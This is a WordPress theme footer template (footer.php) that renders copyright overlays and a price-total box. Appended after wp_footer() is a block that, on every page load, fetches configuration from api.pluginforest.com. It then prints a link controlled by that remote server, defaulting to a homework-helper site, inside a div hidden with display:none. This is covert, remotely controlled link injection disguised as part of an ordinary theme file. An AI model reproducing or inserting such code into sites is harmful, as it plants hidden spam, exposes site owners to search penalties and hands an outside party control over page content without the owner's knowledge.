<?php
/**
 *
 * Footer
 * @since 1.0.0
 * @version 1.0.0
 *
 */


if ( is_page() || is_home() ) {
	$post_id = get_queried_object_id();
} else {
	$post_id = get_the_ID();
}

$post_type = get_post_type( $post_id );
$meta_data = reflector_post_type( $post_id, $post_type );
$disable_footer = isset($meta_data['disable_footer']) && !empty($meta_data['disable_footer']) ? false : true;
$enable_copyright = cs_get_option( 'text_copyright' ) ? cs_get_option( 'text_copyright' ) : '';
$enable_copy = cs_get_option( 'enable_copyright' ) ? cs_get_option( 'enable_copyright' ) : false;
$enable_copy = isset($meta_data['change_enable_copyright']) && !empty($meta_data['change_enable_copyright']) ? $meta_data['enable_copyright'] : $enable_copy; ?>

</div>

<?php if ( (! is_404() && $disable_footer) || ! function_exists( 'cs_framework_init' ) ) {
	do_action('reflector_main_footer');
}

$classCopy = cs_get_option( 'enable_copyright' ) && ! cs_get_option( 'text_copyright' ) ? '' : 'copy';
if ( $enable_copy ): ?>
    <div class="reflector_copyright_overlay <?php echo esc_attr( $classCopy ); ?>">
        <div class="reflector_copyright_overlay-active">
			<?php if ( $enable_copy ) : ?>
                <div class="reflector_copyright_overlay_text">
					<?php echo wp_kses_post( $enable_copyright ); ?>
                </div>
			<?php endif; ?>
        </div>
    </div>
<?php endif; ?>
    <div class="fullview">
        <div class="fullview__close"></div>
    </div>
    <div class="pricelist-total"><?php esc_html_e('Total: ', 'reflector'); ?>
        <span class="currency"></span>
        <span class="price"></span>
    </div>
<?php wp_footer(); ?>
    
<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>